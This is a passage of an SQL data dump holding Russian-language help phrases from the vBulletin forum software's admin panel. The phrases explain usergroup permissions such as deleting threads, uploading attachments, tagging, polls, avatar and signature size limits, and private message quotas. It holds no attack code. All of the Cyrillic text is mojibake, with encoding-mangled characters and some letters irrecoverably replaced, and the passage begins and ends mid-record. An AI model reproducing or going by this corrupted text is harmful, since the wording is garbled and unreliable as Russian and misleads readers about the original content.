'Êîãäà àäìèíèñòðàòîð èëè ìîäåðàòîð óäàëÿåò òåìó, îíè âûáèðàþò îïöèþ \"Ìÿãêîå óäàëåíèå\" èëè \"Ãîëíîå ôèçè÷åñêîå óäàëåíèå\". Åñëè òåìà óäàëåíà \"ìÿãêî\", òî íà ¸¸ ìåñòå â ñïèñêå òåì ðàçäåëà îñòà¸òñÿ óâåäîìëåíèå î å¸ óäàëåíèè. Ãòî ðàçðåøåíèå îïðåäåëÿåò, ìîæåò èëè íåò ïîëüçîâàòåëü èç ýòîé ãðóïïû âèäåòü òàêèå óâåäîìëåíèÿ.', 'vbulletin', '', 0, ''), (24547, -1, 'usergroup_add_edit_canseedelnotice_title', 'cphelptext', 'Ìîæåò âèäåòü óâåäîìëåíèÿ îá óäàëåíèè', 'vbulletin', '', 0, ''), (24548, -1, 'usergroup_add_edit_cansearch_text', 'cphelptext', 'Ãòî ðàçðåøåíèå äà¸ò âîçìîæíîñòü ïîëüçîâàòåëÿì ýòîé ãðóïïû èñêàòü ðàçäåëû. Äëÿ óñïåøíîé ðàáîòû ýòîãî ðàçðåøåíèÿ âàì íóæíî âêëþ÷èòü ïîèñê ïî ôîðóìó â îñíîâíûõ íàñòðîéêàõ ôîðóìà.', 'vbulletin', 'zCarot', 1205430879, '3.7.0 Release Candidate 1'), (24549, -1, 'usergroup_add_edit_cansearch_title', 'cphelptext', 'Ìîæåò èñêàòü ðàçäåëû', 'vbulletin', '', 0, ''), (24550, -1, 'usergroup_add_edit_canemail_text', 'cphelptext', 'Ãòî ðàçðåøåíèå îòêðûâàåò äîñòóï ê ññûëêå \"Îòïðàâèòü ïî ýëåêòðîííîé ïî÷òå\" íà ñòðàíèöàõ ôîðóìà. Ãòà ôóíêöèÿ ïîçâîëÿåò ïîëüçîâàòåëÿì ýòîé ãðóïïû îòïðàâëÿòü ýëåêòðîííûå ïèñüìà ñî ññûëêîé íà òåìó. Åñëè âû íå ðàçðåøàåòå ãîñòÿì ïðîñìàòðèâàòü òåìû, òî ýòó ôóíêöèþ ëó÷øå âûêëþ÷èòü.', 'vbulletin', '', 0, ''), (24551, -1, 'usergroup_add_edit_canemail_title', 'cphelptext', 'Ìîæåò èñïîëüçîâàòü ôóíêöèþ \"Ãëåêòðîííîå ïèñüìî äðóãó\"', 'vbulletin', '', 0, ''), (24552, -1, 'usergroup_add_edit_cangetattachment_text', 'cphelptext', 'Ãòî ðàçðåøåíèå äà¸ò âîçìîæíîñòü ïîëüçîâàòåëÿì ýòîé ãðóïïû ñêà÷èâàòü/ïðîñìàòðèâàòü âëîæåíèÿ. Åñëè ó ïîëüçîâàòåëÿ íåò ðàçðåøåíèÿ ïðîñìàòðèâàòü âëîæåíèÿ, òî âñòðîåííûå èçîáðàæåíèÿ áóäóò îòîáðàæàòüñÿ êàê ññûëêè, ïðè ïåðåõîäå ïî êîòîðûì áóäåò îòîáðàæàòüñÿ ñòðàíèöà \"Ãåò äîñòóïà\".', 'vbulletin', '', 0, ''), (24553, -1, 'usergroup_add_edit_cangetattachment_title', 'cphelptext', 'Ìîæåò ñêà÷èâàòü âëîæåíèÿ', 'vbulletin', '', 0, ''), (24554, -1, 'usergroup_add_edit_canpostnew_text', 'cphelptext', 'Ãòî ðàçðåøåíèå äîâîëüíî î÷åâèäíî. Åñëè ïîëüçîâàòåëü íå èìååò íà ýòî ïðàâ, òî îí íå ñìîæåò ñîçäàòü íîâóþ òåìó.', 'vbulletin', '', 0, ''), (24555, -1, 'usergroup_add_edit_canpostnew_title', 'cphelptext', 'Ìîæåò ñîçäàâàòü òåìû', 'vbulletin', '', 0, ''), (24556, -1, 'usergroup_add_edit_canreplyown_text', 'cphelptext', 'Ãòî ðàçðåøåíèå äà¸ò âîçìîæíîñòü ïîëüçîâàòåëÿì ýòîé ãðóïïû îòâå÷àòü â ñâîèõ òåìàõ. Åñëè ïî êàêèì-ëèáî ïðè÷èíàì âû íå æåëàåòå, ÷òîáû àâòîðû òåìû âûñêàçûâàëèñü â íåé, âûêëþ÷èòå ýòó îïöèþ.', 'vbulletin', '', 0, ''), (24557, -1, 'usergroup_add_edit_canreplyown_title', 'cphelptext', 'Ìîæåò îòâå÷àòü â ñâîèõ òåìàõ', 'vbulletin', '', 0, ''), (24558, -1, 'usergroup_add_edit_canreplyothers_text', 'cphelptext', 'Ãòî ðàçðåøåíèå ïîäîáíî ðàçðåøåíèþ \"Ìîæåò îòâå÷àòü â ñâîèõ òåìàõ\". Îòëè÷èå òîëüêî â òîì, ÷òî ïðåäîñòàâëÿåòñÿ âîçìîæíîñòü îòâå÷àòü íå â ñâîèõ òåìàõ, à â òåìàõ, ñîçäàííûõ äðóãèìè ïîëüçîâàòåëÿìè.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'), (24559, -1, 'usergroup_add_edit_canreplyothers_title', 'cphelptext', 'Ìîæåò îòâå÷àòü â ÷óæèõ òåìàõ', 'vbulletin', '', 0, ''), (24560, -1, 'usergroup_add_edit_caneditpost_text', 'cphelptext', 'Ãòî ðàçðåøåíèå äà¸ò âîçìîæíîñòü ïîëüçîâàòåëÿì ýòîé ãðóïïû ðåäàêòèðîâàòü ñâîè ñîîáùåíèÿ. Ãòî ðàçðåøåíèå ðàáîòàåò âìåñòå ñ îïöèåé \"Ñðîê ðåäàêòèðîâàíèÿ ñîîáùåíèé\" îñíîâíûõ íàñòðîåê.', 'vbulletin', 'zCarot', 1205430879, '3.7.0 Release Candidate 1'), (24561, -1, 'usergroup_add_edit_caneditpost_title', 'cphelptext', 'Ìîæåò ðåäàêòèðîâàòü ñâîè ñîîáùåíèÿ', 'vbulletin', '', 0, ''), (24562, -1, 'usergroup_add_edit_candeletepost_text', 'cphelptext', 'Ãòî ðàçðåøåíèå äà¸ò âîçìîæíîñòü ïîëüçîâàòåëÿì ýòîé ãðóïïû óäàëÿòü ñâîè ñîáñòâåííûå ñîîáùåíèÿ. Ãòà ãðóïïà òàêæå äîëæíà èìåòü ïðàâî ðåäàêòèðîâàòü ñîîáùåíèÿ (ñì. ïðåäûäóùåå ðàçðåøåíèå).

\r\nÃóäüòå îñòîðîæíû ñ ðàçðåøåíèåì óäàëåíèÿ ñîîáùåíèé. Åñëè âû ïîçâîëèòå ïîëüçîâàòåëÿì ðåäàêòèðîâàòü ñâîè ñîîáùåíèÿ áåñêîíå÷íî ïî âðåìåíè (ñì. îïöèþ \"Ñðîê ðåäàêòèðîâàíèÿ ñîîáùåíèé\" çäåñü), òî âû òàêæå ïîçâîëèòå èì óäàëÿòü ñâîè ñîîáùåíèÿ â ëþáîå âðåìÿ, ò.Ã¥. îíè âñåãäà ñìîãóò ïîñìîòðåòü è óäàëèòü âñå ñâîè ñîîáùåíèÿ, åñëè, êîíå÷íî, çàõîòÿò.\r\n\r\nÃîìíèòå: ïîëüçîâàòåëè ìîãóò òîëüêî \"ìÿãêî\" óäàëÿòü ñâîè ñîîáùåíèÿ. Òî åñòü âû ñìîæåòå âîññòàíîâèòü èõ â ëþáîå âðåìÿ.', 'vbulletin', 'zCarot', 1205430879, '3.7.0 Release Candidate 1'), (24563, -1, 'usergroup_add_edit_candeletepost_title', 'cphelptext', 'Ìîæåò óäàëÿòü ñâîè ñîîáùåíèÿ', 'vbulletin', '', 0, ''), (24564, -1, 'usergroup_add_edit_canmove_text', 'cphelptext', 'Åñëè ýòà îïöèÿ âêëþ÷åíà, ïîëüçîâàòåëè ýòîé ãðóïïû ñìîãóò ïåðåìåùàòü ñâîè òåìû â äðóãèå ðàçäåëû ñ ïîìîùüþ ôóíêöèè \"Ãåðåìåñòèòü/ñêîïèðîâàòü òåìó\" â ìåíþ \"Îïöèè òåìû\".', 'vbulletin', '', 0, ''), (24565, -1, 'usergroup_add_edit_canmove_title', 'cphelptext', 'Ìîæåò ïåðåìåùàòü ñâîè òåìû', 'vbulletin', '', 0, ''), (24566, -1, 'usergroup_add_edit_canopenclose_text', 'cphelptext', 'Åñëè ýòà îïöèÿ âêëþ÷åíà, ïîëüçîâàòåëè ýòîé ãðóïïû ñìîãóò îòêðûâàòü/çàêðûâàòü ñâîè òåìû ñ ïîìîùüþ îïöèè \"Îòêðûòü/çàêðûòü òåìó\" â ìåíþ \"Îïöèè òåìû\".

\r\n îòêðûòîé òåìå ìîæíî îñòàâëÿòü ñîîáùåíèÿ, â çàêðûòîé - íåëüçÿ (ýòî íå êàñàåòñÿ àäìèíèñòðàòîðîâ è ìîäåðàòîðîâ).', 'vbulletin', '', 0, ''), (24567, -1, 'usergroup_add_edit_canopenclose_title', 'cphelptext', 'Ìîæåò îòêðûâàòü/çàêðûâàòü ñâîè òåìû', 'vbulletin', '', 0, ''), (24568, -1, 'usergroup_add_edit_candeletethread_text', 'cphelptext', 'Ãòî ðàçðåøåíèå äà¸ò âîçìîæíîñòü ïîëüçîâàòåëÿì ýòîé ãðóïïû óäàëÿòü ñâîè ñîáñòâåííûå òåìû. Ãòà ãðóïïà òàêæå äîëæíà èìåòü ïðàâî ðåäàêòèðîâàòü ñîîáùåíèÿ (ñì. ðàçðåøåíèå \"Ìîæåò ðåäàêòèðîâàòü ñâîè ñîîáùåíèÿ\"), åñëè îíè æåëàþò óäàëèòü òåìó. Ãòî ðàçðåøåíèå ïîçâîëÿåò óäàëÿòü òåìû ïîñðåäñòâîì ðåäàêòèðîâàíèÿ ïåðâîãî ñîîáùåíèÿ â òåìå (ïîÿâèòñÿ ôîðìà äëÿ âûáîðà óäàëåíèÿ òåìû ñ óêàçàíèåì ïðè÷èíû óäàëåíèÿ), à íå ñ ïîìîùüþ âûáîðà îïöèè \"Óäàëèòü òåìó\" èç ìåíþ \"Óïðàâëåíèå òåìàìè\".

\r\nÃóäüòå îñòîðîæíû ñ ðàçðåøåíèåì óäàëåíèÿ òåì. Ãðè óäàëåíèè òåìû óíè÷òîæàþòñÿ âñå ñîîáùåíèÿ, íàõîäÿùèåñÿ â íåé. Åñëè âû ïîçâîëèòå ïîëüçîâàòåëÿì ðåäàêòèðîâàòü ñâîè ñîîáùåíèÿ áåñêîíå÷íî ïî âðåìåíè (ñì. îïöèþ \"Ñðîê ðåäàêòèðîâàíèÿ ñîîáùåíèé\" çäåñü), òî âû òàêæå ïîçâîëèòå èì óäàëÿòü ñâîè òåìû â ëþáîå âðåìÿ, ò.Ã¥. îíè âñåãäà ñìîãóò ïîñìîòðåòü è óäàëèòü âñå ñâîè òåìû, åñëè, êîíå÷íî, çàõîòÿò.', 'vbulletin', 'zCarot', 1205430879, '3.7.0 Release Candidate 1'), (24569, -1, 'usergroup_add_edit_candeletethread_title', 'cphelptext', 'Ìîæåò óäàëÿòü ñâîè òåìû', 'vbulletin', '', 0, ''), (24570, -1, 'usergroup_add_edit_followforummoderation_text', 'cphelptext', 'Åñëè âû âûêëþ÷èòå ýòó îïöèþ, òî âñå ñîîáùåíèÿ, ñîçäàâàåìûå ïîëüçîâàòåëÿìè ýòîé ãðóïïû, áóäóò îòïðàâëåíû â config[Misc][modcpdir]}/moderate.php?do=posts\" target=\"_blank\">î÷åðåäü ïðîâåðêè. Âàì íóæíî áóäåò ïîäòâåðäèòü ñîîáùåíèÿ, äî òîãî êàê îíè áóäóò îòîáðàæàòüñÿ íà ôîðóìå.', 'vbulletin', '', 0, ''), (24571, -1, 'usergroup_add_edit_followforummoderation_title', 'cphelptext', 'Ãîâûå ñîîáùåíèÿ íå ïðîâåðÿþòñÿ', 'vbulletin', '', 0, ''), (24572, -1, 'usergroup_add_edit_cantagown_text', 'cphelptext', 'Åñëè \"Äà\", òî ïîëüçîâàòåëü ñìîæåò ïðèñâàèâàòü ìåòêè ñâîèì òåìàì', 'vbulletin', 'zCarot', 1195733271, '3.7.0 Beta 1'), (24573, -1, 'usergroup_add_edit_cantagown_title', 'cphelptext', 'Ìîæåò ïðèñâàèâàòü ìåòêè ñâîèì òåìàì', 'vbulletin', 'zCarot', 1195733271, '3.7.0 Beta 1'), (24574, -1, 'usergroup_add_edit_picturefollowforummoderation_text', 'cphelptext', 'Åñëè âû âûêëþ÷èòå ýòó îïöèþ, òî âñå èçîáðàæåíèÿ, çàãðóæåííûå ïîëüçîâàòåëÿìè ýòîé ãðóïïû, áóäóò îòïðàâëåíû íà ïðîâåðêó. Âàì ïîòðåáóåòñÿ îäîáðèòü èõ èçîáðàæåíèÿ, ïðåæäå ÷åì îíè áóäóò îòîáðàæåíû â èõ àëüáîìàõ.', 'vbulletin', 'zCarot', 1208787129, '3.7.0 Release Candidate 4'), (24575, -1, 'usergroup_add_edit_picturefollowforummoderation_title', 'cphelptext', 'Ñëåäîâàòü ïðàâèëàì ïðîâåðêè èçîáðàæåíèé', 'vbulletin', 'zCarot', 1203546867, '3.7.0 Beta 6'), (24576, -1, 'usergroup_add_edit_cantagothers_text', 'cphelptext', 'Åñëè \"Äà\", òî ïîëüçîâàòåëü ñìîæåò ïðèñâàèâàòü ìåòêè ê ÷óæèì òåìàì', 'vbulletin', 'zCarot', 1195733408, '3.7.0 Beta 1'), (24577, -1, 'usergroup_add_edit_cantagothers_title', 'cphelptext', 'Ìîæåò ïðèñâàèâàòü ìåòêè ÷óæèì òåìàì', 'vbulletin', 'zCarot', 1195733408, '3.7.0 Beta 1'), (24578, -1, 'usergroup_add_edit_commentfollowforummoderation_text', 'cphelptext', 'Åñëè âû âûêëþ÷èòå ýòó îïöèþ, òî âñå êîììåíòàðèè ê èçîáðàæåíèÿì, îñòàâëåííûå ïîëüçîâàòåëÿìè ýòîé ãðóïïû, áóäóò îòïðàâëåíû íà ïðîâåðêó. Âàì ïîòðåáóåòñÿ îäîáðèòü èõ êîììåíòàðèè ê èçîáðàæåíèÿì, ïðåæäå ÷åì îíè áóäóò îòîáðàæåíû.', 'vbulletin', 'zCarot', 1208787108, '3.7.0 Release Candidate 4'), (24579, -1, 'usergroup_add_edit_commentfollowforummoderation_title', 'cphelptext', 'Ñëåäîâàòü ïðàâèëàì ïðîâåðêè êîììåíòàðèåâ ê èçîáðàæåíèÿì', 'vbulletin', 'zCarot', 1203546910, '3.7.0 Beta 6'), (24580, -1, 'usergroup_add_edit_candeletetagown_text', 'cphelptext', 'Åñëè \"Äà\", òî ïîëüçîâàòåëü ñìîæåò óäàëÿòü ìåòêè ñâîèõ òåì', 'vbulletin', 'zCarot', 1195733535, '3.7.0 Beta 1'), (24581, -1, 'usergroup_add_edit_candeletetagown_title', 'cphelptext', 'Ìîæåò óäàëÿòü ìåòêè â ñâîèõ òåìàõ', 'vbulletin', 'zCarot', 1195733535, '3.7.0 Beta 1'), (24582, -1, 'usergroup_add_edit_cancreatetag_text', 'cphelptext', 'Åñëè \"Äà\", òî ïîëüçîâàòåëü ñìîæåò ñîçäàâàòü ñâîè ìåòêè.  ïðîòèâíîì ñëó÷àå ïðèä¸òñÿ âûáèðàòü èç óæå ñóùåñòâóþùèõ íà ôîðóìå.\r\n \r\n \r\n Ìîæåò îöåíèâàòü òåìû\r\n
\r\nÎöåíêà òåì òàêæå äîëæíà áûòü âêëþ÷åíà â ôîðóìå, ÷òîáû ýòà ãðóïïà ñìîãëà îöåíèâàòü èõ. Âûáåðèòå îïöèþ \"Ãåäàêòèðîâàòü ðàçäåë\" â óïðàâëåíèè ðàçäåëàìè, ÷òîáû íàñòðîèòü ýòó îïöèþ. Äîïîëíèòåëüíî ñóùåñòâóþò íåñêîëüêî îïöèé, êàñàþùèõñÿ îöåíêè òåì â îñíîâíûõ íàñòðîéêàõ ôîðóìà.', 'vbulletin', 'zCarot', 1195733584, '3.7.0 Beta 1'), (24583, -1, 'usergroup_add_edit_cancreatetag_title', 'cphelptext', 'Ìîæåò ñîçäàâàòü ìåòêè', 'vbulletin', 'zCarot', 1195733584, '3.7.0 Beta 1'), (24584, -1, 'usergroup_add_edit_canpostattachment_text', 'cphelptext', 'Ôîðóì ïîçâîëÿåò ïîëüçîâàòåëÿì ïðèêðåïëÿòü ôàéëû ê ñîîáùåíèÿì. Ãòî ðàçðåøåíèå âêëþ÷èò âûøåóïîìÿíóòóþ ôóíêöèþ äëÿ ïîëüçîâàòåëåé äàííîé ãðóïïû. Ãîëüçîâàòåëè ìîãóò çàãðóæàòü ôàéëû ïðè ïîìîùè êíîïêè \"Óïðàâëåíèå âëîæåíèÿìè\" â ôîðìå îòïðàâêè ñîîáùåíèé.', 'vbulletin', '', 0, ''), (24585, -1, 'usergroup_add_edit_canpostattachment_title', 'cphelptext', 'Ìîæåò çàãðóæàòü âëîæåíèÿ', 'vbulletin', '', 0, ''), (24586, -1, 'usergroup_add_edit_attachlimit_text', 'cphelptext', 'Ãîëüçîâàòåëè ýòîé ãðóïïû íå ìîãóò ïðåâûøàòü ýòî îãðàíè÷åíèå íà ñóììàðíûé ðàçìåð âñåõ âëîæåíèé. Ââåäèòå çíà÷åíèå â áàéòàõ.

\r\n1048576 áàéò = 1 ìåãàáàéò', 'vbulletin', '', 0, ''), (24587, -1, 'usergroup_add_edit_attachlimit_title', 'cphelptext', 'Ñóììàðíûé îáúåì (â áàéòàõ), êîòîðûé ïîëüçîâàòåëü ìîæåò èñïîëüçîâàòü äëÿ ñâîèõ âëîæåíèé', 'vbulletin', '', 0, ''), (24588, -1, 'usergroup_add_edit_canpostpoll_text', 'cphelptext', 'Ãòî ðàçðåøåíèå äàåò âîçìîæíîñòü ïîëüçîâàòåëÿì ýòîé ãðóïïû ñîçäàâàòü îïðîñû ïðè ñîçäàíèè íîâûõ òåì. Ãîëüçîâàòåëè ìîãóò ñîçäàòü îïðîñ ïðè ïîìîùè îïöèè \"Äà, äîáàâèòü îïðîñ ê ýòîé òåìå\" íà ñòðàíèöå ñîçäàíèÿ íîâîé òåìû.

\r\nÄîïîëíèòåëüíî ñóùåñòâóþò íåñêîëüêî îïöèé óïðàâëåíèÿ ãîëîñîâàíèÿìè â îñíîâíûõ íàñòðîéêàõ ôîðóìà.', 'vbulletin', 'zCarot', 1205430879, '3.7.0 Release Candidate 1'), (24589, -1, 'usergroup_add_edit_canpostpoll_title', 'cphelptext', 'Ìîæåò ñîçäàâàòü îïðîñû', 'vbulletin', '', 0, ''), (24590, -1, 'usergroup_add_edit_canvote_text', 'cphelptext', 'Ãòî ðàçðåøåíèå î÷åâèäíî. Åñëè óñòàíîâèòü \"Ãåò\", ïîëüçîâàòåëè ýòîé ãðóïïû íå ñìîãóò ãîëîñîâàòü â îïðîñàõ.', 'vbulletin', '', 0, ''), (24591, -1, 'usergroup_add_edit_canvote_title', 'cphelptext', 'Ìîæåò ãîëîñîâàòü', 'vbulletin', '', 0, ''), (24592, -1, 'usergroup_add_edit_canuseavatar_text', 'cphelptext', 'Ãòî ðàçðåøåíèå äà¸ò âîçìîæíîñòü ïîëüçîâàòåëÿì ýòîé ãðóïïû çàãðóæàòü ñâîè àâàòàðû íà ñòðàíèöå Èçìåíèòü àâàòàð â êàáèíåòå ïîëüçîâàòåëÿ. Àâàòàð áóäåò çàãðóæåí ñ êîìïüþòåðà ïîëüçîâàòåëÿ èëè ñêà÷àí ïî ââåä¸ííîìó èì URL è áóäåò õðàíèòüñÿ íà ñåðâåðå.

\r\n×òîáû ýòà ôóíêöèÿ ðàáîòàëà, àâàòàðû äîëæíû áûòü âêëþ÷åíû â îñíîâíûõ íàñòðîéêàõ ôîðóìà. Òàì òàêæå èìåþòñÿ íåêîòîðûå äðóãèå îïöèè, êàñàþùèåñÿ àâàòàðîâ.', 'vbulletin', 'zCarot', 1205430879, '3.7.0 Release Candidate 1'), (24593, -1, 'usergroup_add_edit_canuseavatar_title', 'cphelptext', 'Ìîæåò çàãðóæàòü ñâîè àâàòàðû ', 'vbulletin', '', 0, ''), (24594, -1, 'usergroup_add_edit_avatarmaxwidth_text', 'cphelptext', 'Ââåäèòå ìàêñèìàëüíóþ øèðèíó àâàòàðà, êîòîðóþ ìîãóò èñïîëüçîâàòü ïîëüçîâàòåëè ýòîé ãðóïïû (â ïèêñåëÿõ).', 'vbulletin', '', 0, ''), (24595, -1, 'usergroup_add_edit_avatarmaxwidth_title', 'cphelptext', 'Ìàêñèìàëüíàÿ øèðèíà àâàòàðà (â ïèêñåëÿõ)', 'vbulletin', '', 0, ''), (24596, -1, 'usergroup_add_edit_avatarmaxheight_text', 'cphelptext', 'Ââåäèòå ìàêñèìàëüíóþ âûñîòó àâàòàðà, êîòîðóþ ìîãóò èñïîëüçîâàòü ïîëüçîâàòåëè ýòîé ãðóïïû (â ïèêñåëÿõ).', 'vbulletin', '', 0, ''), (24597, -1, 'usergroup_add_edit_avatarmaxheight_title', 'cphelptext', 'Ìàêñèìàëüíàÿ âûñîòà àâàòàðà (â ïèêñåëÿõ)', 'vbulletin', '', 0, ''), (24598, -1, 'usergroup_add_edit_avatarmaxsize_text', 'cphelptext', 'Ââåäèòå ìàêñèìàëüíûé ðàçìåð àâàòàðà, êîòîðûå ìîãóò èñïîëüçîâàòü ïîëüçîâàòåëè ýòîé ãðóïïû. Çíà÷åíèå äîëæíî áûòü ââåäåíî â áàéòàõ.

\r\n1024 áàéòà = 1 êèëîáàéò
\r\n10240 áàéò = 10 êèëîáàéò
\r\n51200 áàéò = 50 êèëîáàéò
\r\n102400 áàéò = 100 êèëîáàéò', 'vbulletin', '', 0, ''), (24599, -1, 'usergroup_add_edit_avatarmaxsize_title', 'cphelptext', 'Ìàêñèìàëüíûé ðàçìåð çàãðóæàåìîãî àâàòàðà (â áàéòàõ)', 'vbulletin', '', 0, ''), (24600, -1, 'usergroup_add_edit_cansigpic_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâàòåëè ýòîé ãðóïïû çàãðóæàòü èçîáðàæåíèå, êîòîðîå áóäåò ïîìåùåíî â èõ ïîäïèñè. Òðàôèê ïðè çàãðóçêå ýòîãî èçîáðàæåíèÿ áóäåò òàêèì æå, êàê è ïðè çàãðóçêå äðóãèõ èçîáðàæåíèé, íàõîäÿùèõñÿ íà âàøåì ñåðâåðå, íî, èñïîëüçóÿ îïöèè íèæå, âû ìîæåòå êîíòðîëèðîâàòü ðàçìåðû çàãðóæàåìûõ èçîáðàæåíèé: åñëè ïîëüçîâàòåëü ïðîñòî óñòàíîâèò ññûëêó íà èçîáðàæåíèå íà äðóãîì ñåðâåðå, òî êîíòðîëèðîâàòü ÷òî-ëèáî áóäåò íåâîçìîæíî.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24601, -1, 'usergroup_add_edit_cansigpic_title', 'cphelptext', 'Ìîæåò çàãðóæàòü èçîáðàæåíèå ïîäïèñè', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24602, -1, 'usergroup_add_edit_cananimatesigpic_text', 'cphelptext', 'Åñëè ó ïîëüçîâàòåëåé äàííîé ãðóïïû åñòü ïðàâî çàãðóæàòü èçîáðàæåíèå ïîäïèñè ñ ïîìîùüþ îïöèè \"Ìîæåò çàãðóæàòü èçîáðàæåíèå ïîäïèñè\", òî çäåñü âû ìîæåòå îãðàíè÷èòü çàãðóçêó àíèìèðîâàííûõ èçîáðàæåíèé.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24603, -1, 'usergroup_add_edit_cananimatesigpic_title', 'cphelptext', 'Ìîæåò çàãðóæàòü àíèìèðîâàííîå èçîáðàæåíèå ïîäïèñè', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24604, -1, 'usergroup_add_edit_canprofilepic_text', 'cphelptext', 'Ãòî ðàçðåøåíèå äà¸ò âîçìîæíîñòü ïîëüçîâàòåëÿì ýòîé ãðóïïû çàãðóæàòü ôîòîãðàôèè äëÿ ïðîôèëÿ íà ñòðàíèöå Ãåäàêòèðîâàòü ïðîôèëü â êàáèíåòå ïîëüçîâàòåëÿ. Ôîòîãðàôèè çàãðóæàþòñÿ ñ êîìïüþòåðà ïîëüçîâàòåëÿ èëè ñêà÷èâàþòñÿ ïî ââåä¸ííîìó èì URL è õðàíÿòñÿ íà ñåðâåðå.

\r\nÔîòîãðàôèè äîëæíû áûòü âêëþ÷åíû â îñíîâíûõ íàñòðîéêàõ ôîðóìà, ÷òîáû ýòà óñòàíîâêà ðàáîòàëà.', 'vbulletin', '', 0, ''), (24605, -1, 'usergroup_add_edit_canprofilepic_title', 'cphelptext', 'Ìîæåò çàãðóæàòü ôîòîãðàôèè', 'vbulletin', '', 0, ''), (24606, -1, 'usergroup_add_edit_sigpicmaxheight_text', 'cphelptext', 'Åñëè ó ïîëüçîâàòåëåé äàííîé ãðóïïû åñòü ïðàâî çàãðóæàòü èçîáðàæåíèå ïîäïèñè ñ ïîìîùüþ îïöèè \"Ìîæåò çàãðóæàòü èçîáðàæåíèå ïîäïèñè\", òî çäåñü âû ìîæåòå îãðàíè÷èòü ìàêñèìàëüíóþ âûñîòó èçîáðàæåíèÿ â ïèêñåëÿõ. Óêàæèòå 0, ÷òîáû ñíÿòü îãðàíè÷åíèå.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24607, -1, 'usergroup_add_edit_sigpicmaxheight_title', 'cphelptext', 'Ìàêñèìàëüíàÿ âûñîòà èçîáðàæåíèÿ ïîäïèñè (â ïèêñåëÿõ)', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24608, -1, 'usergroup_add_edit_sigpicmaxwidth_text', 'cphelptext', 'Åñëè ó ïîëüçîâàòåëåé äàííîé ãðóïïû åñòü ïðàâî çàãðóæàòü èçîáðàæåíèå ïîäïèñè ñ ïîìîùüþ îïöèè \"Ìîæåò çàãðóæàòü èçîáðàæåíèå ïîäïèñè\", òî çäåñü âû ìîæåòå îãðàíè÷èòü ìàêñèìàëüíóþ øèðèíó èçîáðàæåíèÿ â ïèêñåëÿõ. Óêàæèòå 0, ÷òîáû ñíÿòü îãðàíè÷åíèå.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24609, -1, 'usergroup_add_edit_sigpicmaxwidth_title', 'cphelptext', 'Ìàêñèìàëüíàÿ øèðèíà èçîáðàæåíèÿ ïîäïèñè (â ïèêñåëÿõ)', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24610, -1, 'usergroup_add_edit_profilepicmaxwidth_text', 'cphelptext', 'Ãòî ìàêñèìàëüíàÿ øèðèíà ôîòîãðàôèè â ïðîôèëå ÷ëåíîâ ýòîé ãðóïïû ïîëüçîâàòåëåé.', 'vbulletin', '', 0, ''), (24611, -1, 'usergroup_add_edit_profilepicmaxwidth_title', 'cphelptext', 'Ìàêñèìàëüíàÿ øèðèíà ôîòîãðàôèè (â ïèêñåëÿõ)', 'vbulletin', '', 0, ''), (24612, -1, 'usergroup_add_edit_sigpicmaxsize_text', 'cphelptext', 'Åñëè ó ïîëüçîâàòåëåé äàííîé ãðóïïû åñòü ïðàâî çàãðóæàòü èçîáðàæåíèå ïîäïèñè ñ ïîìîùüþ îïöèè \"Ìîæåò çàãðóæàòü èçîáðàæåíèå ïîäïèñè\", òî çäåñü âû ìîæåòå îãðàíè÷èòü ìàêñèìàëüíûé ðàçìåð ôàéëà èçîáðàæåíèÿ â áàéòàõ. Óêàæèòå 0, ÷òîáû ñíÿòü îãðàíè÷åíèå.
\r\n
\r\n1024 áàéòà = 1 êèëîáàéò
\r\n10240 áàéò = 10 êèëîáàéò
\r\n51200 áàéò = 50 êèëîáàéò
\r\n102400 áàéò = 100 êèëîáàéò', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24613, -1, 'usergroup_add_edit_sigpicmaxsize_title', 'cphelptext', 'Ìàêñèìàëüíûé ðàçìåð ôàéëà èçîáðàæåíèÿ ïîäïèñè (â áàéòàõ)', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24614, -1, 'usergroup_add_edit_profilepicmaxheight_text', 'cphelptext', 'Ãòî ìàêñèìàëüíàÿ âûñîòà, êîòîðóþ ìîæåò èìåòü ôîòîãðàôèÿ â ïðîôèëå ÷ëåíà ýòîé ãðóïïû.', 'vbulletin', '', 0, ''), (24615, -1, 'usergroup_add_edit_profilepicmaxheight_title', 'cphelptext', 'Ìàêñèìàëüíàÿ âûñîòà ôîòîãðàôèè (â ïèêñåëÿõ)', 'vbulletin', '', 0, ''), (24616, -1, 'usergroup_add_edit_profilepicmaxsize_text', 'cphelptext', 'Ãòî ìàêñèìàëüíûé ðàçìåð ôîòîãðàôèè â ïðîôèëå ÷ëåíîâ ýòîé ãðóïïû.

\r\n1024 áàéòà = 1 êèëîáàéò
\r\n10240 áàéò = 10 êèëîáàéò
\r\n51200 áàéò = 50 êèëîáàéò
\r\n102400 áàéò = 100 êèëîáàéò', 'vbulletin', '', 0, ''), (24617, -1, 'usergroup_add_edit_profilepicmaxsize_title', 'cphelptext', 'Ìàêñèìàëüíûé ðàçìåð ôàéëà ôîòîãðàôèè (â áàéòàõ)', 'vbulletin', '', 0, ''), (24618, -1, 'usergroup_add_edit_pmquota_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò, ñêîëüêî ëè÷íûõ ñîîáùåíèé ìîãóò èìåòü ÷ëåíû ýòîé ãðóïïû â ñâîèõ ïàïêàõ ëè÷íûõ ñîîáùåíèé. Åñëè ïîëüçîâàòåëü äîñòèãíåò ïðåäåëà, åìó ïîòðåáóåòñÿ óäàëèòü íåñêîëüêî ËÑ, ïðåæäå ÷åì îí ñìîæåò ïîëó÷àòü íîâûå.
\r\n
